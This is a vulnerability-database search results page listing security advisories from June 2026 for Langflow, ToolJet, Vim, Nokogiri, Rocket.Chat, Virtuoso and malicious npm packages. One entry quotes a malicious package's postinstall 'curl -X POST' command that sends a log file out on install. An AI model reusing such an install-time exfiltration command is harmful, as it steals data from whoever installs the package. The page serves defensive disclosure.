Lucene search
K

19510 matches found

IBM Security Bulletins
IBM Security Bulletins
added 2026/06/25 5:32 p.m.3 views

Security Bulletin: SSRF Vulnerability in Langflow OSS Legacy Components Bypasses Protection

Summary Langflow OSS versions = 1.9.3 contain SSRF vulnerability in legacy RSS Reader and SearXNG components that bypass SSRF protection introduced in v1.9.3. RSSReaderComponent calls requests.getself.rssurl directly on user input without validateurlforssrf check, completely bypassing protection...

8.2CVSS5.9AI score0.00199EPSS
Exploits0Affected Software1
NVD
NVD
added 2026/06/25 5:16 p.m.12 views

CVE-2026-55411

ToolJet is the open-source foundation am AI-native platform for building and deploying internal tools, workflows and AI agents. Prior to 3.20.1780-lts, the authenticated endpoint POST /api/data-sources/decrypt returns the decrypted plaintext for any credential whose credentialid is supplied in th...

6.8CVSS0.00126EPSS
Exploits0References1
OSV
OSV
added 2026/06/25 5:6 p.m.4 views

MAL-2026-6466 Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/06/25 4:16 p.m.2 views

UBUNTU-CVE-2026-57451

Vim is an open source, command line text editor. Prior to 9.2.0670, gettextprops in src/textprop.c reads a uint16 property count stored inline after a line's text and returns it as the number of 32-byte textpropT entries that follow. The only check is a floor that guarantees room for a single...

6.1CVSS5.8AI score0.00113EPSS
Exploits0References3
Debian CVE
Debian CVE
added 2026/06/25 3:34 p.m.4 views

CVE-2026-55693

Vim is an open source, command line text editor. Prior to 9.2.0653, the treecountwords function in src/spellfile.c fills in the word-count fields of a spell-file word trie by walking it iteratively with a depth counter. The counter is bounded only by the trie structure itself; it is never checked...

8.4CVSS5.8AI score0.00126EPSS
Exploits0
Debian CVE
Debian CVE
added 2026/06/25 2:34 p.m.5 views

CVE-2026-57437

Nokogiri is an open source XML and HTML library for the Ruby programming language. Prior to 1.19.4, Nokogiri::XML::XPathContext did not keep its source document alive for garbage collection. If an XPathContext outlived its document and the document was collected, evaluating an XPath expression...

6.3CVSS5.9AI score0.00312EPSS
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:51 a.m.10 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
Nuclei
Nuclei
added 2026/06/25 5:45 a.m.16 views

ThinkPHP < 3.2.4 - Remote Code Execution

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality. id: CVE-2019-9082 info: name: ThinkPHP 3.2.4 - Remote Code Execution author: 0xanis severity: high description: |...

9.3CVSS7.5AI score0.97419EPSS
Exploits8References5
NVD
NVD
added 2026/06/24 10:16 p.m.9 views

CVE-2026-55666

Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to 8.5.1, 8.4.4, 8.3.6, 8.2.6, 8.1.6, 8.0.7, and 7.10.13, in apps/meteor/app/apple/server/loginHandler.ts, handleIdentityToken parses a JWT issued by Apple during the OAuth flow. The try block checks for an...

9.3CVSS0.00295EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/06/24 3:36 p.m.4 views

CVE-2025-61025

A flaw was found in virtuoso-opensource. Attackers can exploit this vulnerability by sending specially crafted SQL statements, which can lead to a Denial of Service DoS. This issue impacts the availability of the affected system...

7.5CVSS5.8AI score0.0035EPSS
Exploits0References4
Tenable Nessus
Tenable Nessus
added 2026/06/24 12:0 a.m.7 views

Linux Distros Unpatched Vulnerability : CVE-2025-61022

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.9AI score0.0035EPSS
Exploits0References3
EUVD
EUVD
added 2026/06/23 6:31 p.m.7 views

EUVD-2025-210316

An issue in the sqlonaturaljoincond component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

5.9AI score0.0035EPSS
Exploits0References2
EUVD
EUVD
added 2026/06/23 6:31 p.m.6 views

EUVD-2025-210317

An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.9AI score0.0035EPSS
Exploits0References2
EUVD
EUVD
added 2026/06/23 6:31 p.m.6 views

EUVD-2025-210313

An issue in the sqloplacedtset component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.9AI score0.00482EPSS
Exploits0References2
OSV
OSV
added 2026/06/23 6:17 p.m.5 views

DEBIAN-CVE-2025-61029

An issue in the sqlountry component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.8AI score0.0035EPSS
Exploits0References1
NVD
NVD
added 2026/06/23 5:16 p.m.5 views

CVE-2025-61025

An issue in the sslrqstget component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS0.0035EPSS
Exploits0References1
OSV
OSV
added 2026/06/23 5:16 p.m.4 views

DEBIAN-CVE-2025-61022

An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.8AI score0.0035EPSS
Exploits0References1
OSV
OSV
added 2026/06/23 5:16 p.m.4 views

DEBIAN-CVE-2025-61020

An issue in the sqlostripinjoin component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS5.8AI score0.00482EPSS
Exploits0References1
NVD
NVD
added 2026/06/23 5:16 p.m.10 views

CVE-2025-61028

An issue in the timettodt component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS0.00482EPSS
Exploits0References4
NVD
NVD
added 2026/06/23 5:16 p.m.7 views

CVE-2025-61019

An issue in the sqlokeypartbest component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service DoS via crafted SQL statements...

7.5CVSS0.0035EPSS
Exploits0References1
Rows per page
Query Builder